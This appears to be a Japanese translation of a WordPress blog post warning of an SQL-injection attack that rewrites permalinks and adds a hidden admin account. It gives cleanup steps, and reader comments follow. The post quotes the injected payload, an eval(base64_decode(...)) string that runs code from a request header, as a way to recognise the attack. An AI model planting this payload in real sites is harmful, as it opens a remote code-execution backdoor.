最近、コードがサイトに注入されるSQL攻撃を受けているサイトが多くあります。このMySQLインジェクションは、パーマリンクを無効にすることで影響を与えます。その結果、ブログ投稿のURLが機能しなくなります。この攻撃では多数のWordPressブログが標的となりました。この件を私たちに知らせてくれたAndy Sowardに感謝します。
この攻撃により、パーマリンク構造に追加されたコードのいずれかが存在していました:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
これらの引用符はサイト上のすべてのパーマリンクに追加され、手動で削除しない限り変更できません。
これを修正するには、以下に移動してください。
設定 > パーマリンクに移動し、上記のコードを削除して、デフォルトコードに置き換えてください。
次にやるべきことは、ユーザーに移動することです。複数の管理者がいることがわかります。名前は表示されませんが、カウントが増加していることがわかります。したがって、やるべきことは、すべてのユーザーを見て、最後に登録したユーザーを見つけることです。そのユーザーの上にマウスを置いてリンクを取得します。コードのuserid=を、その数字に1を追加して変更します。たとえば、表示できる最後のユーザーがユーザー番号2だった場合、それに1を追加して3にします。隠された管理者は、最初の名前として奇妙なコードを持っているはずです。そのコードを削除し、購読者に設定します。その後戻って削除します。
これで問題が解決するはずです。PHPMyAdminにアクセスして、ユーザーを削除することもできます。そこにユーザーが表示されるからです。
できるだけ早くこのニュースを広めたいので、ユーザーは最新情報を得ることができます。ブログが感染していないことを確認してください。WordPressがすぐにリリースされることを願っています。
また、WordPress管理画面を保護するために、これらの対策の一部をまだ実装していない場合。


ahmed_alaaedin
私のウェブサイトのデータベースは数日前にインジェクションされ、各投稿またはページのURLの後に奇妙な文字や単語が追加されました。設定:パーマリンクやユーザーメニューに何も奇妙なものが見つかりませんでした。この問題を解決するにはどうすればよいですか?私のホスティング会社は、感染したデータベースのバックアップも持っています!
WordPressユーザー
これに2回やられました。
初めての時はwasupプラグインのSQLインジェクションでしたが、今回はよくわかりません。ホスティングプロバイダーにブロックされました。
アカウントが復旧したらWordPressを削除します。もううんざりです!
編集スタッフ
WordPressのせいではなく、おそらくあなたのホスティングセキュリティがあまり良くないのではないでしょうか…
管理者
ジョーイ
これで何がわかりましたか?私も同じ問題に遭遇しました。私のアカウント上のすべてのWPサイトが同じ問題を抱えています。
lerrkin
こんにちは。
興味深いURL https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ がここからリンクされており、空白ページが表示されます。
コードには「‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
編集スタッフ
このコメントは大変感謝しております。問題はWP Super Cacheではなく、WP External Linkというプラグインが原因だと考えています。WP-Super Cacheを2回アンインストールして再インストールしましたが、その後、すべてが正常に機能していた開発サーバーと比較しました。違いはこのプラグインでした。そのプラグインを削除すると機能しました。これでその投稿を読むことができます。
管理者
lerrkin
おそらくWP External LinkとSuper Cacheの競合でした…
テキストは「Page not cached by WP Super Cache. No closing HTML tag. Check your theme」でした。
上記に貼り付けたWP-Super-Cacheのhtmlコメントはhtmlコメントとして機能し、見えなくなります
したがって、最新のSuper Cacheバージョンではhtmlの有効性チェックを行わないことを約束しています。
ああ、読んでいます!
どうもありがとうございます!
ロゼリ A. バカール
これを強調してくれてありがとう